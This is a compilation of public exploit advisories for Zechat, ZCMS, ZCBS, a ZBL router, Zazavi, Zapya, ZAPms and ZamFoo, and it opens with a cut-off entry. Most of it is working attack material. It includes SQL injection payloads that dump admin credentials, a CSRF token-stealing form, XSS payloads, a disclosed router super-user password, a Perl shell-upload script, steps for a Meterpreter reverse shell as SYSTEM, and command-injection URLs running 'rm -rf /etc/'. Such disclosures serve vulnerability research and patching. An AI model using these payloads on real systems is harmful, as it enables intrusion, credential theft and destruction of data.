# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL]
# 
# -1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+-
# 
# Parameter: groupid (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: groupid=1 AND 3188=3188
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: groupid=1 AND SLEEP(5)
# 
#     Type: UNION query
#     Title: Generic UNION query (NULL) - 9 columns
#     Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM
# 	
# Etc..
# # # # #
HireHackking 
# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross site request forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://bylancer.com
# Version: 1.5
# Tested on: Kali linux
====================================================
# POC 1 : SQLi :

Parameter : hashtag
    type : Union based

http://test.com/chat/hashtag?hashtag=[SQL]

# test :
http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23

# Payload : -1' UNION SELECT
NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()%23

====================================================

Parameter : v
    type : time-based blind

test.com/chat/me?action=edit&v=[SQL]

# test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23

# Payload : AND sleep(10)%23

====================================================

# POC 2 : CSRF :

# CSRF vulnerability allows attacker to change user's information.
In this script we have anti-csrf which we can't change user's information
without token.
So we use 'hashtag' parameter to set our encoded payload and bypass csrf
protection : chat/hashtag?hashtag=[We have Reflected XSS here]

# Exploit :

  <form action="http://test.com/chat/data_settings.php" method="POST">
      <input type="hidden" name="csrf&#95;token" value="" />
      <input type="hidden" name="Wall"
value="Hello&#32;would&#32;you&#32;like&#32;to&#32;be&#32;my&#32;friend" />
      <input type="hidden" name="user" value="lord225" />
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="mail"
value="d3code&#46;n&#64;gmail&#46;com" />
      <input type="hidden" name="website" value="test" />
      <input type="hidden" name="sex" value="male" />
      <input type="hidden" name="country"
value="&#45;&#45;&#45;&#45;&#45;&#45;" />
      <input type="hidden" name="day" value="" />
      <input type="hidden" name="month" value="" />
      <input type="hidden" name="year" value="" />
      <input type="hidden" name="Language" value="en" />
    </form>

    <script>

var token = '';
  var req = new XMLHttpRequest();
  req.onreadystatechange = function(){
    if(this.readyState == 4 && this.status == 200){

          var setPage = this.responseXML;
          token = setPage.forms[1].elements[0].value; // get token
          console.log(token);
         }

  }
      req.open("POST","/chat/settings",true);

req.setRequestHeader("content-type","application/x-www-form-urlencoded");
      req.responseType = "document";
      req.send();

      document.forms[0].elements[0].value = token; // set token to our form
      document.forms[0].submit();

</script>

=====================================================
HireHackking

Zechat 1.5 - SQL Injection 

# # # # # 
# Exploit Title: Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://bylancer.com/
# Software Link: https://codecanyon.net/item/facebook-style-php-ajax-chat-zechat/16491266
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5978
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/login.php
# 
# User: ' UNION ALL SELECT 0x31,0x32,0x33,concat(0x63)-- A
# Pass: anything
# 
# # # # #
HireHackking 
# Exploit Title: Zechat 1.5 - 'uname' SQL Injection
# Exploit Author: Ihsan Sencan
# Date: 2018-10-02
# Dork: N/A
# Vendor Homepage: https://bylancer.com/
# Software Link: https://bylancer.com/products/zechat-php-script/index.php
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

https://Target/products/zechat-php-script/profile.php?uname=demo

'+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229)--+-
HireHackking 
# Exploit Title:  SQL Injection & Persistent XSS
# Google Dork: intitle: SQL Injection & Persistent XSS
# Date: 2015-06-12
# Exploit Author:  John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: zencherry.com
# Software Link: sourceforge.net/projects/zencherrycms
# Version: 1.1
# Tested on: windows 7 on Apache Tomcat
# Category: webapps


Vendor:
=============================================
http://zencherry.com/
http://sourceforge.net/projects/zencherrycms



Product:
==================================================
ZCMS 1.1 JavaServer Pages Content Management System



Advisory Information:
==============================
SQL Injection & Persistent XSS



Vulnerability Details:
======================
SQL Injection (CVE-2015-7346):
Login to admin area requires a password but is easily bypassed
using classic SQLInjection method because application uses
concatenated user input to construct SQL queries.


ZCMS exploitable admin login code:
==================================
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users
WHERE
status = 0 AND username = '"+username+"' AND password =
'"+request.getParameter("pass") +"' AND type = 1 ;";


So we just supply an Admin password like --->  HELL' OR '2'='2
which will resolve as true!


SQL Inject XSS Payload:
=======================
We can also inject persisten XSS payload directly to MySQL database
subverting
all character filtering leveraging existing SQLInjection vulnerabilities.


Persistent XSS (CVE-2015-7347):
===============

Another persistent XSS vector is here in author field for comments:
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
number]


Exploit code(s):
===============

1) Bypass admin login
---------------------
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
Enter 'admin' for username field
Enter HELL' OR '2'='2 for the pass field


2) Inject XSS using SQL Injection
---------------------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=
"<script>alert(1)</script>
&content=<script>alert(1)</script>&author=<script>alert(1)</script>
SATAN&visibility=1&type=1&comm=0


3) Persistent XSS field
-----------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
number]
Inject <script>alert(666)</script> in author input field.



Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 12, 2015 : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================

Request Method(s):         [+] GET & POST


Vulnerable Product:        [+] ZCMS_1.1


Vulnerable Parameter(s):   [+] pass, title, content, author


Affected Area(s):          [+] Admin, CMS


===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar,
provided that
due credit is given to the author. The author is not responsible for any
misuse of the
information contained herein and prohibits any malicious use of all
security related
information or exploits by the author or elsewhere.


(hyp3rlinx)
HireHackking 
# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Date: 2023-03-30
# CVE: CVE-2023-26692
# Exploit Author: Abdulaziz Saad (@b4zb0z)
# Vendor Homepage: https://www.zcbs.nl
# Version: 4.14k
# Tested on: LAMP, Ubuntu
# Google Dork: inurl:objecten.pl?ident=3D

---

[#] Vulnerability :

`$_GET['ident']`


[#] Exploitation :

`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=
=3Dalert(%22XSS%22)%3E`
HireHackking 
# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
# Date: 31.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com

Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
Product web page: http://www.zblchina.com | http://www.wd-thailand.com
Affected version: Firmwre: V100R001
                  Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
                  EONU Hardware Version	V3.0
                  Software: V2.46.02P6T5S
                  Main Chip: RTL9607
                  Master Controller, Copyright (c) R&D

Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
router.

Desc: The application suffers from a privilege escalation
vulnerability. The limited administrative user (admin:admin)
can elevate his/her privileges by sending a HTTP GET request
to the configuration backup endpoint or the password page
and disclose the http super user password. Once authenticated
as super, an attacker will be granted access to additional and
privileged functionalities.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5467
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php


31.01.2021

--


Get config file and disclose super pwd:
---------------------------------------

POST /HG104B-ZG-E.config HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://192.168.1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.1.1/system_configure.asp
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6

CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=


...
  #web_1
    user_web_name=super
    user_web_password=www168nettv
...


Disclose super pwd from system pwd page:
----------------------------------------

GET /system_password.asp
Host: 192.168.1.1

...
var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
...
HireHackking 
source: https://www.securityfocus.com/bid/49309/info

Zazavi is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.

Zazavi 1.2.1 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl
system ("title KedAns-Dz");
system ("color 1e");
system ("cls");
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|==========================================|
|= Zazavi <=1.2.1 * Arbitrary Shell Upload |
|=   >> Provided By KedAns-Dz <<           |
|=  e-mail : ked-h[at]hotmail.com          |
|==========================================|
INTRO
print "\n";
print "[*] Enter URL(f.e: http://target.com): ";
    chomp(my $url=<STDIN>);
print "\n";
print "[*] Enter File Path (f.e: C:\\Shell.php.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php.gif)
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/admin/editor/filemanager/controller.php',
               Content_Type => 'multipart/form-data',
               Content      => 
				[ 
				action => 'uploadFile',
				newfile => 'DzOffendersCr3w.php',
				filepath => $file,
				] );
print "\n";
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
    else { print "[-] File Upload Is Disabled! Failed!\n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;
HireHackking 
# Exploit Title: Zapya Desktop Version ('ZapyaService.exe') Privilege Escalation  
# Date: 2016/9/12
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://www.izapya.com/
# Software Link: http://binaries.izapya.com/Izapya/Windows_PC/ZapyaSetup_1803_en.exe
# Version: 1.803 (Latest)
# Tested on: Windows 7 Professional X86 - Windows 10 Pro X64
# CVE : N/A

======================
# Description :
# Zapya is a 100% free tool for sharing files across devices like Android, iPhone, iPad, Window’s Phone, PC, and Mac computers in an instant. 
# It’s Easy to use and supports multiple languages. We are already a community of 300 million strong users and growing rapidly.
# When You Install Zapya Desktop , Zapya Will Install A Service Named ZapyaService.exe And It's Placed In Zapya Installation Directory .
# If We Replace The ZapyaService.exe File With A Malicious Executable File It Will Execute As NT/SYSTEM User Privilege.
======================

# Proof Of Concept :
# 1- Install Zapya Desktop . 
# 2- Generate A Meterpreter Executable Payload .
# 3- Stop Service And Replace It With ZapyaService.exe With Exact Name.
# 4- Listen Handler For Connection And Start Service Again or Open Zapya Desktop , Application Will Attempt To Start Service 
# 5- After Starting Service We Have Reverse Meterpreter Shell With NT/SYSTEM Privilege.

==================
# Discovered By Arash Khazaei
==================
HireHackking 
source: https://www.securityfocus.com/bid/47782/info

ZAPms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ZAPms 1.22 is vulnerable; other versions may also be affected. 

The following example request is available:

<form action="http://www.example.com/[path]/?sid=1" method="post" id="Login" >
<input name="nick" type="text" id="nick" value="'SQL+CODE+HERE" />
<input name="pwd" id="pwd" type="password" value="adminpwd" />
<input name="submit" type="submit" class="submit_login" value="Login" />
</form>
HireHackking 
source: https://www.securityfocus.com/bid/67215/info

ZamFoo is prone to multiple remote command-execution vulnerabilities.

Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

ZamFoo 12.6 is vulnerable; other versions may also be affected. 

https://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}

https://www.example.com/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=